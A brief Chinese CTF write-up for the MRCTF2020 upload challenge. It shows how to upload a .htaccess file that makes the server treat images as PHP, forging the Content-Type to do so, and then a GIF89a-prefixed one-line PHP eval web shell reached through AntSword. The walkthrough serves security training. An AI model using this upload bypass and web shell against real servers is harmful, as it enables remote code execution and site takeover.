[MRCTF2020]你传你🐎呢

[MRCTF2020]你传你🐎呢

和.user.ini那道题有异曲同工之处,[SUCTF 2019]CheckIn

提前上传一个.htaccess文件,注意上传的时候要把Content-Type改为image/jpeg才能绕过成功上传。

SetHandler application/x-httpd-php

然后上传shell.jpg,内容为:

GIF89a
<script language='php'>@eval($_POST['cmd']);</script>

然后用这个jpg的地址连接蚁剑

得到flag

.htaccess配置文件

参考:.htaccess文件在CTF中的解析

posted @ 2024-08-01 15:59  8o1er9t  阅读(4)  评论(0编辑  收藏  举报